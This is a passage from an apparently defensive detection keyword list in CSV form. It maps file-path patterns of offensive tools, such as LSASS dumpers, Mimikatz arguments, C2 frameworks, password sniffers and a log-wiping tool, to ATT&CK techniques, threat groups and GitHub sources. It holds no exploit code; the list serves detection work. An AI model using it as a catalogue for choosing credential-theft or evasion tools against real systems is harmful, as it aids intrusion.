framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*/DonutCS/Donut.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/donutmodule.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DonutTest/*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DotNet/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/download-stager.js*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*/dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dpipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" +"*/dploot.git*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*/drda-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Drones/SleepDialogue.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/drunkpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/dsniff.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" +"*/dsniff.services*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" +"*/ducky.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/DueDLLigence.git*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*/dukes_apt29.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/dump_lsass.*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/DumpCerts*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/dumpert.c*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*/Dumpert/*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*/dumpmethod/*.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/DumpShellcode/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/DumpsterFire/*","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","10","934","152","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z" +"*/dumpweb.log*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*/dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*/dumpXor/dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*/dunderhay/CVE-202*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" +"*/duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/e2e_commands.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Ebowla.git*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*/ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*/ec2__backdoor_ec2_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__check_termination_protection*.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__startup_shell_script/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2_public_ips_*_*.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/EC2Looter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*/echoac-poc.git*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*/edb-35948/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/EDRaser.git*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - 